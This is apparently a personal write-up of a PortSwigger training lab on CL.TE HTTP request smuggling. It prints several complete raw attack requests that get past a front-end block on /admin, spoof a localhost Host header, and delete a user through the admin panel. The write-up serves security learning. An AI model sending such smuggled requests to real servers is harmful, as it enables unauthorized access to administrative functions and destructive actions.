Exploiting HTTP request smuggling to bypass front-end security controls, CL.TE vulnerability | Feb 1, 2023

Introduction

Welcome to my another writeup! In this Portswigger Labs lab, you’ll learn: Exploiting HTTP request smuggling to bypass front-end security controls, CL.TE vulnerability! Without further ado, let’s dive in.

• Overall difficulty for me (From 1-10 stars): ★☆☆☆☆☆☆☆☆☆

Background

This lab involves a front-end and back-end server, and the front-end server doesn’t support chunked encoding. There’s an admin panel at /admin, but the front-end server blocks access to it.

To solve the lab, smuggle a request to the back-end server that accesses the admin panel and deletes the user carlos.

Exploitation

Home page:

According to the lab’s background, the admin panel is at /admin:

Burp Suite HTTP history:

However, when we reach there, the application blocks us from accessing to it.

How can we bypass that?

Now, we can send that request to Burp Suite’s Repeater, and test HTTP request smuggling:

First, we need to change the request method to POST:

Then, we can test is it vulnerable to CL.TE (Front-end uses Content-Length header, back-end uses Transfer-Encoding header) or TE.CL (Front-end uses Transfer-Encoding header, back-end uses Content-Length header) HTTP request smuggling.

To test CL.TE, we can:

• Send an attack POST request to /:

POST / HTTP/1.1
Host: 0a2f009403af3669c1fc45c300e100cd.web-security-academy.net
Content-Type: application/x-www-form-urlencoded
Content-Length: 34
Transfer-Encoding: chunked

0

GET /admin HTTP/1.1
X-Foo: x

This request will smuggle a GET request to /admin:

• Then, send a normal GET request to /:

We successfully bypass the access block!

However, it said: “Admin interface only available to local users”.

Luckly, we can still bypass this by supplying another HTTP header called Host:

POST / HTTP/1.1
Host: 0a2f009403af3669c1fc45c300e100cd.web-security-academy.net
Content-Type: application/x-www-form-urlencoded
Content-Length: 34
Transfer-Encoding: chunked

0

GET /admin HTTP/1.1
Host: localhost
X-Foo: x

Hmm… “Duplicate header names are not allowed”.

To bypass that, we can smuggle an empty GET parameter:

POST / HTTP/1.1
Host: 0a2f009403af3669c1fc45c300e100cd.web-security-academy.net
Content-Type: application/x-www-form-urlencoded
Content-Length: 34
Transfer-Encoding: chunked

0

GET /admin HTTP/1.1
Host: localhost
Content-Length: 15

bypasspls=

Nice!! We successfully fully bypassed the access block!

Let’s delete user carlos by smuggling a request:

POST / HTTP/1.1
Host: 0a2f009403af3669c1fc45c300e100cd.web-security-academy.net
Content-Type: application/x-www-form-urlencoded
Content-Length: 34
Transfer-Encoding: chunked

0

GET /admin/delete HTTP/1.1
Host: localhost
Content-Length: 15

username=carlos&bypasspls=

We successfully deleted user carlos!

What we’ve learned:

1. Exploiting HTTP request smuggling to bypass front-end security controls, CL.TE vulnerability